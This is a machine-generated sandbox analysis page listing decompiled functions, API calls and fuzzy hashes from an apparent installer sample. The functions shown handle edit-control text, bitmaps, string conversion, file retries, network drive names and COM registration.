Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47ef1872e46dca3bcd178273236e5877d045f18fdcc376afff38dc6785d385f
Instruction ID: f311d58181889ba6b85912f0e00d48b4f28911ea733a9b4d136e7a4935890b68
Opcode Fuzzy Hash: e47ef1872e46dca3bcd178273236e5877d045f18fdcc376afff38dc6785d385f
Instruction Fuzzy Hash: C6312E70648740AFC320DB69C544BABBBE8AF88754F05881EF9D5C7752C638FC808B19

Uniqueness

Uniqueness Score: -1.00%

Function 004299E4 Relevance: 7.6, APIs: 5, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004299E4(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x429acf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E004183F8( *((intOrPtr*)(__eax + 8))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E004183F8( *((intOrPtr*)(_t57 + 8))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E004183F8( *((intOrPtr*)(_t57 + 8))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00403708( &_v12, _v8, 0x429ae8);
								goto L6;
							}
						}
					} else {
						E00403708( &_v12, 0x429ae8, _v8);
						L6:
						SendMessageA(E004183F8( *((intOrPtr*)(_t57 + 8))), 0xb1, _t42, _t42);
						_t34 = E00403880(_v12);
						SendMessageA(E004183F8( *((intOrPtr*)(_t57 + 8))), 0xc2, 0, _t34);
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x429ad6);
				return E00403548( &_v12);
			}

0x004299ef
0x004299f2
0x004299f5
0x004299f7
0x004299fb
0x004299fc
0x00429a01
0x00429a04
0x00429a09
0x00429a25
0x00429a29
0x00429a54
0x00429a58
0x00429a6b
0x00429a72
0x00429a74
0x00429a81
0x00000000
0x00429a81
0x00429a72
0x00429a2b
0x00429a36
0x00429a86
0x00429a96
0x00429a9e
0x00429ab4
0x00429ab4
0x00429a29
0x00429abb
0x00429abe
0x00429ac1
0x00429ace

APIs

SendMessageA.USER32 ref: 00429A20
SendMessageA.USER32 ref: 00429A4F
SendMessageA.USER32 ref: 00429A6B
SendMessageA.USER32 ref: 00429A96
SendMessageA.USER32 ref: 00429AB4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 33912425e75a5e81015f7a5e798669875d2ad2d689a7a3b11d8498f5e99de4d1
Instruction ID: 71bc57cb73519f43203fbe336503a73024115a7934a0de05a51535c2dc10017d
Opcode Fuzzy Hash: 33912425e75a5e81015f7a5e798669875d2ad2d689a7a3b11d8498f5e99de4d1
Instruction Fuzzy Hash: 48219D707407557BE710ABAACC82F4B76ACEB80B08F50447EB911A7292DFB9AD40825D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDD0 Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041BDD0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				signed int _t51;
				intOrPtr _t52;
				signed int _t55;
				intOrPtr* _t65;
				intOrPtr _t85;
				signed int _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t91;

				_t89 = _t90;
				_t91 = _t90 + 0xffffffe4;
				_v12 = __ecx;
				_t65 = __edx;
				_v8 = __eax;
				_v32 = GetSystemMetrics(0xb);
				_v28 = GetSystemMetrics(0xc);
				 *(_v8 + 8) =  *(_v8 + 8) >> 1;
				 *(_v8 + 0x14) = E0041BDBC( *(_v8 + 4) * ( *(_v8 + 0xe) & 0x0000ffff)) *  *(_v8 + 8);
				_t51 = E0041B700( *(_v8 + 0xe));
				_t87 = _t51;
				_push(0);
				L00406034();
				_v20 = _t51;
				if(_v20 == 0) {
					E0041B5AC();
				}
				_push(_t89);
				_push(0x41bf95);
				_push( *[fs:edx]);
				 *[fs:edx] = _t91;
				_t52 = _v8;
				_v24 = _t52 + 0x28 + (_t87 << 2);
				_push(0);
				_push(_t52);
				_push(_v24);
				_push(4);
				_push(_v8);
				_t55 = _v20;
				_push(_t55);
				L00405CE4();
				_v16 = _t55;
				if(_v16 == 0) {
					E0041B5AC();
				}
				_push(_t89);
				_push(0x41beb8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91;
				 *_t65 = E0041B5C4(_v16, 0,  &_v32);
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E0041BEBF);
				return DeleteObject(_v16);
			}

0x0041bdd1
0x0041bdd3
0x0041bdd8
0x0041bddb
0x0041bddd
0x0041bde7
0x0041bdf1
0x0041bdf7
0x0041be17
0x0041be21
0x0041be26
0x0041be28
0x0041be2a
0x0041be2f
0x0041be36
0x0041be38
0x0041be38
0x0041be3f
0x0041be40
0x0041be45
0x0041be48
0x0041be4b
0x0041be5a
0x0041be5d
0x0041be62
0x0041be66
0x0041be67
0x0041be6c
0x0041be6d
0x0041be70
0x0041be71
0x0041be76
0x0041be7d
0x0041be7f
0x0041be7f
0x0041be86
0x0041be87
0x0041be8c
0x0041be8f
0x0041be9f
0x0041bea3
0x0041bea6
0x0041bea9
0x0041beb7

APIs

GetSystemMetrics.USER32 ref: 0041BDE2
GetSystemMetrics.USER32 ref: 0041BDEC
740BAC50.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BE2A
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BF95,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BE71
DeleteObject.GDI32(00000000), ref: 0041BEB2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MetricsSystem$DeleteObject
String ID:
API String ID: 4263548647-0
Opcode ID: f6427c12e78747918e6bbb63b1750ea29d1e16eb6cfdde24748c4f1850abdfc8
Instruction ID: 576132143ccfecf3b2a42457fa623971e674ca3ddd884c513c5e643ae379458a
Opcode Fuzzy Hash: f6427c12e78747918e6bbb63b1750ea29d1e16eb6cfdde24748c4f1850abdfc8
Instruction Fuzzy Hash: 82314D74E00208EFDB04DFA5C941AAEB7F9EB48704F11856AE514AB381D7389E40DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403DEC Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00403DEC(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E004036BC(__eax);
				if(E004036BC(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L004012D0();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E00403880(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L004012D0();
					_t17 = _t15;
				}
				return _t17;
			}

0x00403df6
0x00403dff
0x00403e0d
0x00403e44
0x00403e49
0x00403e4b
0x00403e4c
0x00403e4e
0x00403e53
0x00403e5d
0x00403e0f
0x00403e2b
0x00403e2c
0x00403e30
0x00403e31
0x00403e36
0x00403e36
0x00403e6e

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403E44
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403E4E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403E5D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 2cc95d6f7b1f127dcf46e57af42dec1a8123eba99fe49ccf17d1077a6d996994
Instruction ID: 8553b393521568fe2c41fe67b513b28362bdb8871c566aa6fe10746e1f77f2e9
Opcode Fuzzy Hash: 2cc95d6f7b1f127dcf46e57af42dec1a8123eba99fe49ccf17d1077a6d996994
Instruction Fuzzy Hash: D6F044613442043AE16035A64C87FA7298CCB41BDAF10057EB708FA2D1D8B99D0442FD

Uniqueness

Uniqueness Score: -1.00%

Function 004145F8 Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004145F8(intOrPtr* __eax, void* __ecx, signed int __edx, void* __eflags) {
				void* _v4;
				intOrPtr _v7;
				char _v19;
				intOrPtr _v36;
				char _v47;
				void* __ebx;
				signed int _t16;
				void* _t21;
				void* _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t32;
				signed int* _t33;

				_t33 = _t32 + 0xfffffff8;
				 *_t33 = __edx;
				_t31 = __eax;
				_v19 = 0;
				_t29 = E00402D48(__eax, 0xffef, __ecx, __eflags);
				if(_t29 != 0) {
					_t21 =  *((intOrPtr*)( *_t31 + 0x30))();
					_t16 = ( *_t33 ^ 0x00000001) & 0x0000007f;
					_push(_t16);
					_push(_t29);
					_push(_t21);
					L00405E34();
					_t30 = _t16;
					_push(_t21);
					L00405DF4();
					if(_t16 != 0) {
						 *((intOrPtr*)( *_t31 + 0x44))();
					}
					_push(1);
					_push(_t30);
					_push(_t21);
					L00405E34();
					_push(_t21);
					L00405DF4();
					_push(_t21);
					_push(_v36);
					L0040621C();
					_v47 = 1;
				}
				return _v7;
			}

0x004145fb
0x004145fe
0x00414601
0x00414603
0x00414613
0x00414617
0x00414624
0x0041462b
0x0041462e
0x0041462f
0x00414630
0x00414631
0x00414636
0x00414638
0x00414639
0x00414640
0x00414646
0x00414646
0x00414649
0x0041464b
0x0041464c
0x0041464d
0x00414652
0x00414653
0x00414658
0x0041465d
0x0041465e
0x00414663
0x00414663
0x00414671

APIs

740BB410.GDI32(00000000,00000000,00000000), ref: 00414631
740BB150.GDI32(00000000,00000000,00000000,00000000), ref: 00414639
740BB410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041464D
740BB150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414653
740BB380.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041465E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B150B410$B380
String ID:
API String ID: 2237492430-0
Opcode ID: 21e81aa133a391416738bdc62ed9c7cc6bfcf457dd58368824ec4defba356cf6
Instruction ID: 54b9f4dbbe73ea6e97e09b1380e83115c72cd2121ebde513e967f01fb0ea53ff
Opcode Fuzzy Hash: 21e81aa133a391416738bdc62ed9c7cc6bfcf457dd58368824ec4defba356cf6
Instruction Fuzzy Hash: F801DF752083806BD700B63ACC49A9F6BDD8FDA318F09446EF088DB2C2CA7ACC018765

Uniqueness

Uniqueness Score: -1.00%

Function 00453B24 Relevance: 7.5, APIs: 5, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00453B24(long __eax, void* __edx, long _a4) {
				long _v8;
				long _t4;
				void* _t8;
				long _t9;
				long _t11;
				void* _t13;
				void* _t14;

				_t4 = __eax;
				_v8 = _t9;
				_t11 = __eax;
				_t13 = __edx - 1;
				if(_t13 < 0) {
					L10:
					return _t4;
				}
				_t14 = _t13 + 1;
				_t8 = 0;
				L2:
				L2:
				if(_t8 != 1) {
					if(_t8 > 1) {
						Sleep(_a4);
					}
				} else {
					Sleep(_v8);
				}
				_t4 = E00403880(_t11);
				_push(_t4);
				L0040598C();
				if(_t4 != 0) {
					goto L10;
				}
				_t4 = GetLastError();
				if(_t4 == 2) {
					goto L10;
				}
				_t4 = GetLastError();
				if(_t4 == 3) {
					goto L10;
				}
				_t8 = _t8 + 1;
				_t14 = _t14 - 1;
				if(_t14 != 0) {
					goto L2;
				}
				goto L10;
			}

0x00453b24
0x00453b2b
0x00453b2e
0x00453b32
0x00453b35
0x00453b86
0x00453b86
0x00453b86
0x00453b37
0x00453b38
0x00000000
0x00453b3a
0x00453b3d
0x00453b4d
0x00453b53
0x00453b53
0x00453b3f
0x00453b43
0x00453b43
0x00453b5a
0x00453b5f
0x00453b60
0x00453b67
0x00000000
0x00000000
0x00453b69
0x00453b71
0x00000000
0x00000000
0x00453b73
0x00453b7b
0x00000000
0x00000000
0x00453b7d
0x00453b7e
0x00453b7f
0x00000000
0x00000000
0x00000000

APIs

Sleep.KERNEL32(?), ref: 00453B43
Sleep.KERNEL32(?), ref: 00453B53
6D2B5F60.KERNEL32(00000000), ref: 00453B60
GetLastError.KERNEL32(00000000), ref: 00453B69
GetLastError.KERNEL32(00000000), ref: 00453B73

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: db47c859a72238f24b5f880bcba7317b7ae61fa4b73b1cb6dc40a1b021a34d7c
Instruction ID: 00fa771ec8d72f4602502740fe327201ee04e851d64e26ccebaae66dc87039a5
Opcode Fuzzy Hash: db47c859a72238f24b5f880bcba7317b7ae61fa4b73b1cb6dc40a1b021a34d7c
Instruction Fuzzy Hash: 99F024B2E01328668A257AEA48C697FA24CD9413FB724013FFD00E7203C43DEE0946BD

Uniqueness

Uniqueness Score: -1.00%

Function 004565EF Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004565EF(void* __ebx, void* __edi, void* __esi) {
				void* _t6;
				void* _t13;
				void* _t27;
				intOrPtr _t30;
				void* _t34;

				_t6 =  *0x49df30 - 1;
				if(_t6 == 0) {
					SetLastError( *0x49df34);
					E00451B58("LoadLibrary", __ebx, _t27, __edi, __esi, __eflags);
				} else {
					_t13 = _t6 - 1;
					if(_t13 == 0) {
						SetLastError( *0x49df34);
						E00451B58("GetProcAddress", __ebx, _t27, __edi, __esi, __eflags);
					} else {
						_t37 = _t13 == 1;
						if(_t13 == 1) {
							__eflags = E004063BC( *0x49df34);
							if(__eflags != 0) {
								E00451C00( *0x0048CA60, __ebx,  *0x49df34, __edi, __esi, __eflags);
							}
						} else {
							E00451AFC("HelperRegisterServer: StatusCode invalid", __ebx, __edi, __esi, _t37);
						}
					}
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E0045667B);
				return E00403548(_t34 - 0xc);
			}

0x004565f4
0x004565f5
0x00456605
0x0045660f
0x004565f7
0x004565f7
0x004565f8
0x0045661c
0x00456626
0x004565fa
0x004565fa
0x004565fb
0x00456637
0x00456639
0x0045664d
0x0045664d
0x004565fd
0x00456659
0x00456659
0x004565fb
0x004565f8
0x00456660
0x00456663
0x00456666
0x00456673

APIs

SetLastError.KERNEL32(?), ref: 00456605
SetLastError.KERNEL32(?), ref: 0045661C

Strings

GetProcAddress, xrefs: 00456621
HelperRegisterServer: StatusCode invalid, xrefs: 00456654
LoadLibrary, xrefs: 0045660A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorLast
String ID: GetProcAddress$HelperRegisterServer: StatusCode invalid$LoadLibrary
API String ID: 1452528299-1321573290
Opcode ID: 2f536f9cb61a7f29fd0e6a511c2df4d605e25633c0ba1556664db9f31e186864
Instruction ID: 0074ae75e00a2da9dc1cd298f8258a959d777eff63c8152b3a0ed80384768518
Opcode Fuzzy Hash: 2f536f9cb61a7f29fd0e6a511c2df4d605e25633c0ba1556664db9f31e186864
Instruction Fuzzy Hash: 05F081346181448A8F20AB69A94351977A4E7243463D3403BBC02C326BDA3DEC1DCB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004070DC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156
shareCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004070DC(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v25;
				void* _v32;
				void* _v36;
				void _v1060;
				char _v1064;
				char _v1068;
				int _t76;
				void* _t113;
				intOrPtr _t116;
				signed int _t128;
				void* _t131;
				void* _t132;
				void* _t134;
				void* _t135;
				intOrPtr _t136;

				_t134 = _t135;
				_t136 = _t135 + 0xfffffbd8;
				_v1064 = 0;
				_v1068 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t134);
				_push(0x407320);
				_push( *[fs:eax]);
				 *[fs:eax] = _t136;
				E004035DC(_v12, _v8);
				if( *0x48c0e0 == 1) {
					_v25 = E004028E4( *_v8);
					if(_v25 >= 0x41 && _v25 <= 0x5a && E004036BC(_v8) >= 3 &&  *((char*)(_v8 + 1)) == 0x3a &&  *((char*)(_v8 + 2)) == 0x5c && WNetOpenEnumA(1, 1, 0, 0,  &_v32) == 0) {
						 *[fs:edx] = _t136;
						_v20 = 0x640;
						_v36 = E00402650(_v20,  *[fs:edx], 0x4072fb, _t134);
						_push(_t134);
						_push(0x4072dd);
						_push( *[fs:edx]);
						 *[fs:edx] = _t136;
						while(1) {
							L10:
							_v16 = 0xffffffff;
							_v24 = _v20;
							_t76 = WNetEnumResourceA(_v32,  &_v16, _v36,  &_v24);
							if(_t76 == 0xea) {
								break;
							}
							if(_t76 == 0) {
								_t131 = _v16 - 1;
								if(_t131 < 0) {
									continue;
								} else {
									_t132 = _t131 + 1;
									_t128 = 0;
									while(1) {
										_t107 = _v36 + (_t128 << 2) * 8;
										if( *((intOrPtr*)(_v36 + (_t128 << 2) * 8 + 0x10)) != 0 && E004028E4( *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x10))))) == _v25) {
											break;
										}
										_t128 = _t128 + 1;
										_t132 = _t132 - 1;
										if(_t132 != 0) {
											continue;
										} else {
											goto L10;
										}
										goto L21;
									}
									E004038C0(_v8, E004036BC(_v8) - 2, 3,  &_v1064);
									_push(_v1064);
									E00403674( &_v1068,  *((intOrPtr*)(_t107 + 0x14)));
									_pop(_t113);
									E00403708(_v12, _t113, _v1068);
									E00403304();
									E00403304();
								}
							} else {
								E00403304();
								E00403304();
							}
							goto L21;
						}
						_v20 = _v24;
						E00402680( &_v36, _v20);
						goto L10;
					}
				} else {
					_v24 = 0x400;
					if(WNetGetUniversalNameA(E00403880(_v8), 1,  &_v1060,  &_v24) == 0) {
						E00403674(_v12, _v1060);
					}
				}
				L21:
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E00407327);
				return E00403568( &_v1068, 2);
			}

0x004070dd
0x004070df
0x004070ea
0x004070f0
0x004070f6
0x004070f9
0x004070fe
0x004070ff
0x00407104
0x00407107
0x00407110
0x0040711c
0x00407167
0x0040716e
0x004071cd
0x004071d0
0x004071df
0x004071e4
0x004071e5
0x004071ea
0x004071ed
0x004071f0
0x004071f0
0x004071f0
0x004071fa
0x0040720d
0x00407217
0x00000000
0x00000000
0x0040722e
0x00407242
0x00407245
0x00000000
0x00407247
0x00407247
0x00407248
0x0040724a
0x00407252
0x00407259
0x00000000
0x00000000
0x004072bb
0x004072bc
0x004072bd
0x00000000
0x004072bf
0x00000000
0x004072bf
0x00000000
0x004072bd
0x00407286
0x00407291
0x0040729b
0x004072a9
0x004072aa
0x004072af
0x004072b4
0x004072b4
0x00407230
0x00407230
0x00407235
0x00407235
0x00000000
0x0040722e
0x0040721c
0x00407225
0x00000000
0x00407225
0x0040711e
0x0040711e
0x00407142
0x00407153
0x00407153
0x00407142
0x00407302
0x00407304
0x00407307
0x0040730a
0x0040731f

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040713B
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 004071B5
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040720D

Strings

Z, xrefs: 00407174

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 70bec3c067cc58fbcec5aff2d09dde69e7c82f4ad25056678ed06b9cde6aa3fd
Instruction ID: ad34d675e623d51feda49522ab93970f133d2059fcd7fff8c9a607321cc22fb1
Opcode Fuzzy Hash: 70bec3c067cc58fbcec5aff2d09dde69e7c82f4ad25056678ed06b9cde6aa3fd
Instruction Fuzzy Hash: E25172B0E042099BDB11DF55C956A9FBBB9FB08304F1045BAF900B72D1C778AE41DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00431E5C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00431E5C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v274;
				char _v280;
				char _v284;
				struct HINSTANCE__* _t72;
				void* _t85;
				void* _t142;
				void* _t147;
				intOrPtr _t153;
				void* _t187;
				void* _t190;

				_v280 = 0;
				_v284 = 0;
				_v8 = 0;
				_v12 = 0;
				_t147 = __edx;
				_t187 = __eax;
				_push(_t190);
				_push(0x4320e5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190 + 0xfffffee8;
				_t192 =  *((char*)(__eax + 0x24));
				if( *((char*)(__eax + 0x24)) != 0) {
					E004315E0(__eax + 0x10, 0,  &_v8);
					_t72 =  *0x48d014; // 0x400000
					E00403628( &_v12, GetModuleFileNameA(_t72,  &_v274, 0x106),  &_v274, _t192);
					if(_t147 == 0) {
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E004036C4( &_v280, 0x43212c);
						_push( &_v280);
						E00431654( &_v284);
						_pop(_t85);
						E004036C4(_t85, _v284);
						E0043163C(_v280);
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E004036C4( &_v280, "\\ProgID");
						E0043163C(_v280);
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E0043163C(_v280);
						E004035DC( &_v280,  *((intOrPtr*)(_t187 + 0xc)));
						E004036C4( &_v280, "\\Clsid");
						E0043163C(_v280);
						E0043163C( *((intOrPtr*)(_t187 + 0xc)));
					} else {
						E0043160C( *((intOrPtr*)(_t187 + 0xc)),  *((intOrPtr*)(_t187 + 0x20)));
						E004035DC( &_v280,  *((intOrPtr*)(_t187 + 0xc)));
						E004036C4( &_v280, "\\Clsid");
						E0043160C(_v280, _v8);
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E0043160C(_v280,  *((intOrPtr*)(_t187 + 0x20)));
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E004036C4( &_v280, "\\ProgID");
						E0043160C(_v280,  *((intOrPtr*)(_t187 + 0xc)));
						E004035DC( &_v280, "CLSID\\");
						E004036C4( &_v280, _v8);
						E004036C4( &_v280, 0x43212c);
						_push( &_v280);
						E00431654( &_v284);
						_pop(_t142);
						E004036C4(_t142, _v284);
						E0043160C(_v280, _v12);
					}
				}
				_pop(_t153);
				 *[fs:eax] = _t153;
				_push(E004320EC);
				E00403568( &_v284, 2);
				return E00403568( &_v12, 2);
			}

0x00431e6a
0x00431e70
0x00431e76
0x00431e79
0x00431e7c
0x00431e7e
0x00431e82
0x00431e83
0x00431e88
0x00431e8b
0x00431e8e
0x00431e92
0x00431e9e
0x00431eaf
0x00431ec5
0x00431ecc
0x00431fdb
0x00431fe9
0x00431ff9
0x00432004
0x0043200b
0x00432016
0x00432017
0x00432022
0x00432032
0x00432040
0x00432050
0x0043205b
0x0043206b
0x00432079
0x00432084
0x00432092
0x004320a2
0x004320ad
0x004320b5
0x00431ed2
0x00431ed8
0x00431ee6
0x00431ef6
0x00431f04
0x00431f14
0x00431f22
0x00431f30
0x00431f40
0x00431f4e
0x00431f5e
0x00431f6c
0x00431f7c
0x00431f8a
0x00431f9a
0x00431fa5
0x00431fac
0x00431fb7
0x00431fb8
0x00431fc6
0x00431fc6
0x00431ecc
0x004320bc
0x004320bf
0x004320c2
0x004320d2
0x004320e4

APIs

Part of subcall function 004315E0: 76787E10.OLE32(?,?,00000000,?,?,00431EA3,00000000,004320E5,?,?,?,?,?,00432278), ref: 004315E9
Part of subcall function 004315E0: 7678A680.OLE32(00000000,?,?,00000000,?,?,00431EA3,00000000,004320E5,?,?,?,?,?,00432278), ref: 00431601

GetModuleFileNameA.KERNEL32(00400000,?,00000106,00000000,004320E5,?,?,?,?,?,00432278), ref: 00431EB5

Part of subcall function 0043160C: 6D2B6840.ADVAPI32(80000000,00000000,00000001,00000000,00000000,?,?,00431EDD,00400000,?,00000106,00000000,004320E5,?,?,?), ref: 00431631

Strings

